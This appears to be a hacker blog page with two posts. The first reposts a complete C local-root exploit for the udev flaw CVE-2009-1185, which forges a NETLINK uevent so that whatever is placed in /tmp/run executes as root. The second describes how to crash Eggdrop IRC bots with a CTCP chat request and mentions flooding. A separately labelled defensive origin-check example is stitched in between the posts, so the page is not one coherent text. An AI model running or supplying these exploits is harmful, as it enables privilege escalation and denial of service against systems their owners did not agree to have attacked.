
CVE-2009-1185.c udev (rules) < 141 Local Privilege Escalation Exploit (Alternate/cleaner than the kcope bash version)

Posted on 8th January 2012 in Exploits

YES! Amazingly, I do like SOME of Jono's code! Yes, when it is neater and nicer than the alternatives of course, but NOT when they're crippled :) k thx. So, this is being posted now, a bit late, but better than never..

/*
 * CVE-2009-1185.c udev (rules) < 141 Local Privilege Escalation Exploit
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 * Information:
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
 *   udev before 1.4.1 does not verify whether a NETLINK message originates
 *   from kernel space, which allows local users to gain privileges by sending
 *   a NETLINK message from user space.
 * Notes:
 *   An alternate version of kcope's exploit.  This exploit leverages the
 *   95-udev-late.rules functionality that is meant to run arbitrary commands
 *   when a device is removed.  A bit cleaner and reliable as long as your
 *   distro ships that rule file.  The exploit will execute /tmp/run as root
 *   so throw whatever payload you want in there.
 *   Pass the PID of the udevd netlink socket (listed in /proc/net/netlink,
 *   usually is the udevd PID minus 1) as argv[1].
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

int main(int argc, char **argv) {
    int sock;
    char *mp;
    char message[4096];
    struct msghdr msg;
    struct iovec iovector;
    struct sockaddr_nl address;

    if (argc != 2) {
        fprintf(stderr, "usage: %s <udevd netlink pid>\n", argv[0]);
        return 1;
    }

    /* Netlink address of the udevd socket the message is sent to */
    memset(&address, 0, sizeof(address));
    address.nl_family = AF_NETLINK;
    address.nl_pid = atoi(argv[1]);
    address.nl_groups = 0;

    /* The msghdr must be zeroed, otherwise the unset control/flags fields are garbage */
    memset(&msg, 0, sizeof(msg));
    msg.msg_name = (void *)&address;
    msg.msg_namelen = sizeof(address);
    msg.msg_iov = &iovector;
    msg.msg_iovlen = 1;

    sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
    if (sock < 0) {
        perror("socket");
        return 1;
    }
    bind(sock, (struct sockaddr *)&address, sizeof(address));

    /* Uevent wire format: "action@devpath" header, then NUL-separated KEY=VALUE pairs */
    mp = message;
    mp += sprintf(mp, "a@/d") + 1;
    mp += sprintf(mp, "SUBSYSTEM=block") + 1;
    mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;
    mp += sprintf(mp, "TIMEOUT=10") + 1;
    mp += sprintf(mp, "ACTION=remove") + 1;
    mp += sprintf(mp, "REMOVE_CMD=/tmp/run") + 1;  /* root cmd here, see the notes above */

    iovector.iov_base = (void *)message;
    iovector.iov_len = (size_t)(mp - message);
    if (sendmsg(sock, &msg, 0) < 0)
        perror("sendmsg");
    close(sock);
    return 0;
}

XD
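The defender's side of the bug described in the header comment, as an added example that is not part of the post or of udev's own code: the sender check a uevent listener needs (the kind of check udev 141 added), applied before the payload is parsed, with a constructed sample message in the uevent wire format and a small property lookup. The function and macro names, and the sample payload, are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <linux/netlink.h>

#define UEVENT_MCAST_GROUP 1u  /* multicast group the kernel broadcasts uevents on (assumed name) */

/* Constructed sample in the kernel uevent wire format the exploit forges:
 * "action@devpath" header, then NUL-separated KEY=VALUE properties. */
static const char SAMPLE_UEVENT[] =
    "remove@/devices/virtual/block/foo\0SUBSYSTEM=block\0ACTION=remove\0REMOVE_CMD=/tmp/run\0";
static size_t nlen(const char *s, size_t n) { size_t i = 0; while (i < n && s[i]) i++; return i; }  /* bounded strlen */

/* Origin check: the kernel's source address has nl_pid == 0 and carries the multicast group
 * it sent to; user space can never bind nl_pid 0, so a non-zero pid or unicast delivery is forged. */
int uevent_from_kernel(const struct sockaddr_nl *from) {
    return from->nl_family == AF_NETLINK && from->nl_pid == 0 &&
           (from->nl_groups & UEVENT_MCAST_GROUP) != 0;
}

/* Value of KEY in a uevent payload (len bytes, without a trailing string NUL), or NULL if absent. */
const char *uevent_get(const char *buf, size_t len, const char *key) {
    size_t klen = strlen(key), off = nlen(buf, len) + 1;  /* skip the "action@devpath" header */
    while (off < len) {
        const char *f = buf + off;
        size_t flen = nlen(f, len - off);
        if (flen > klen && f[klen] == '=' && memcmp(f, key, klen) == 0)
            return f + klen + 1;
        off += flen + 1;
    }
    return NULL;
}

/* 1 if a listener may act on the message, 0 if it must be dropped: the sender is checked
 * before the payload is parsed, so a forged REMOVE_CMD is never even looked at. */
int uevent_accept(const struct sockaddr_nl *from, const char *buf, size_t len) {
    if (!uevent_from_kernel(from))
        return 0;
    if (memchr(buf, '@', nlen(buf, len)) == NULL)  /* malformed header */
        return 0;
    return uevent_get(buf, len, "ACTION") != NULL && uevent_get(buf, len, "SUBSYSTEM") != NULL;
}

int main(void) {
    struct sockaddr_nl kern = { .nl_family = AF_NETLINK, .nl_pid = 0, .nl_groups = UEVENT_MCAST_GROUP };
    struct sockaddr_nl user = { .nl_family = AF_NETLINK, .nl_pid = 4242, .nl_groups = 0 };  /* forged */
    size_t n = sizeof(SAMPLE_UEVENT) - 1;
    printf("kernel=%d user=%d\n", uevent_accept(&kern, SAMPLE_UEVENT, n), uevent_accept(&user, SAMPLE_UEVENT, n));
    return 0;
}
```

A real listener gets `from` by passing a `struct sockaddr_nl` as `msg_name` to `recvmsg()`; the same idea extends to checking `SCM_CREDENTIALS` when `SO_PASSCRED` is enabled on the socket.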

Eggdrop 1.6.19+ctcpbugfix(and below) ctcp bug

Posted on 26th September 2011 in Exploits

So, I guess you all wondered how this worked etc. etc.. and yes, there are a few ‘ways’ I have seen which, as I saw, none of worked… so I played around with the 1.6.19+ctcpfix version, YES the ‘fix’ version :P and what do I find…
well, instead of your usual /dcc chat try /ctcp chat, that's it.
Simple as, and it was hiding for a long time.. works effectively on the eggdrop BSD build, and on the RH build, but not tested on ALL packages, although I suspect the same buffer is responsible for all these bugs; this was even in wraith’s src at one stage I believe… but fixed much much sooner than eggdrop.. I guess some of your botpax out there are easy to crash!
have phun!
And, modifying the ctcp command and flooding the unit/target with requests also works; also fake file dcc sends seem to be accepted, and no, I won't show you this code, but it is VERY simple mIRC scripting..
Discovered by who the fk knows,
Exploited by me,
Credits to whoever else has found this, but no one else was able to reproduce this properly yet, and why does this occur on a darn ctcpfix version :s bad src… The safest way is to download and use the oldest eggdrop src which does NOT suffer from the bug as far as I know, and this is the dev1.6.8 version which has ipv6+ssl and will soon overtake the silly-arse 1.6.20 and below branch… the 1.6.8 somehow was lost and its configs are a little different, but I run it on my box… it is a secure alternative and simply needs 2 changes to operate the same way, that is replacing ip with vhost and ip6 with vhost6… and people have not used it because of that reason… so pathetic.. use this version, so, as they have said, all other versions are buggy; until 1.6.20, any of those are all buggy. They really want to release a good build of the ipv6+ssl but people refuse to budge, so I will tell admins of boxes: set up an eggy config maker, and that way it would be easier.. make it as advanced as the person would want it to be, so use advanced configs, and that way people will use your proper eggy and not use .patch sets etc. for old crap! Oh and maybe reading eggheads.org news might help just a little ;p
Enjoy the /ctcp chat while it lasts :p
Cheers
xd

My new fav pic:

^^ that's my kinda country!